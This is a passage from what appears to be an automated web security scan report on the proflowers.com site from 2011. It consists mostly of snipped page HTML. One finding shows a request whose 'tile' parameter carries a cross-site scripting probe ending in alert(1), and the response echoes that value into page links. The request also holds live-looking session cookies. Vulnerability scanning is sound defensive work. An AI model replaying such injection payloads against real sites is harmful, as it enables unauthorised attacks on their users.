ase=false" href="http://products.proflowers.com/flowers/Deluxe-Two-Days-Just-for-Mom-30002825?viewpos=53&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Two Days Just for Mom" border="0" /></a>
...[SNIP]...
" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Two-Days-Just-for-Mom-30002825?viewpos=53&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/necklaces/family-necklace-30001190?viewpos=54&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="family necklace" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/necklaces/family-necklace-30001190?viewpos=54&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/A-Mothers-Dreams-30050116?viewpos=55&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="A Mother...s Dreams" border="0" /></a>
...[SNIP]...
ls - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/A-Mothers-Dreams-30050116?viewpos=55&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
e" href="http://products.proflowers.com/lilies/Deluxe-Fragrant-Stargazer-Lilies-for-Mom-41360?viewpos=56&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Fragrant Stargazer Lilies for Mom" border="0" /></a>
...[SNIP]...
="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Deluxe-Fragrant-Stargazer-Lilies-for-Mom-41360?viewpos=56&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=57&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Hugs and Kisses" border="0" /></a>
...[SNIP]...
- Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=57&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Deluxe-Lilies-for-Mom-40699?viewpos=58&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Lilies for Mom" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Deluxe-Lilies-for-Mom-40699?viewpos=58&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/roses/Deluxe-Moms-Reward-41358?viewpos=59&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Mom&#39;s Reward" border="0" /></a>
...[SNIP]...
tails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/roses/Deluxe-Moms-Reward-41358?viewpos=59&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
Vase=false" href="http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Spectacular-41214?viewpos=60&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Mother&#39;s Day Spectacular" border="0" /></a>
...[SNIP]...
w" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Spectacular-41214?viewpos=60&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ucts.proflowers.com/chocolatestrawberry/Full-Half-Dozen-Hand-Picked-Swizzled-Berries-30005170?viewpos=61&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Full Half Dozen Hand Picked Swizzled Berries" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/chocolatestrawberry/Full-Half-Dozen-Hand-Picked-Swizzled-Berries-30005170?viewpos=61&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunshine-of-My-Love-40824?viewpos=62&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sunshine of My Love" border="0" /></a>
...[SNIP]...
ls - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunshine-of-My-Love-40824?viewpos=62&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
href="http://products.proflowers.com/chocolate/Two-Full-Dozen-Hand-Picked-Fancy-Berries-9726?viewpos=63&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Full Dozen Hand Picked Fancy Berries" border="0" /></a>
...[SNIP]...
0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/chocolate/Two-Full-Dozen-Hand-Picked-Fancy-Berries-9726?viewpos=63&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/flowers/Country-Cottage-Garden-30008420?viewpos=64&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Victorian Rose Garden" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Country-Cottage-Garden-30008420?viewpos=64&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/monthlyflowers/3-Months-of-Flowers-2202?viewpos=65&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="3 Months of Flowers" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/monthlyflowers/3-Months-of-Flowers-2202?viewpos=65&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/monthlyflowers/6-Months-of-Flowers-2204?viewpos=66&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="6 Months of Flowers" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/monthlyflowers/6-Months-of-Flowers-2204?viewpos=66&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/monthlyflowers/12-Months-of-Flowers-2206?viewpos=67&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="12 Months of Flowers" border="0" /></a>
...[SNIP]...
y Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/monthlyflowers/12-Months-of-Flowers-2206?viewpos=67&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ck="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/100-Blooms-for-Mom-960?viewpos=68&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="100 Blooms for Mom" border="0" /></a>
...[SNIP]...
etails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/100-Blooms-for-Mom-960?viewpos=68&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/200-Blooms-for-Mom-11146?viewpos=69&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="200 Blooms for Mom" border="0" /></a>
...[SNIP]...
ails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/200-Blooms-for-Mom-11146?viewpos=69&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" border="0" /> </div>
...[SNIP]...
:emailInput" type="text" value="Enter Your Email Here" id="_ctl29_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
e freshest flowers, guaranteed to last at least 7 days." border="0" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a>
...[SNIP]...
ternational flower delivery" border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/international?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a><a title="Unique personalized gifts for life...s special occasions." border="0" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" onclick="exitMVTFreeVase=false" href="http://www.berries.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript><img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;"></noscript>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
16.32. http://www.proflowers.com/send-flowers-bsl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /send-flowers-bsl?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:17:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:17:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:23 GMT
Content-Length: 251606


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="canonical" href="http://www.proflowers.com/send-flowers-bsl"/>
       <link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_category.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
   </head>
...[SNIP]...
<div id="innerContainer">

                       <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
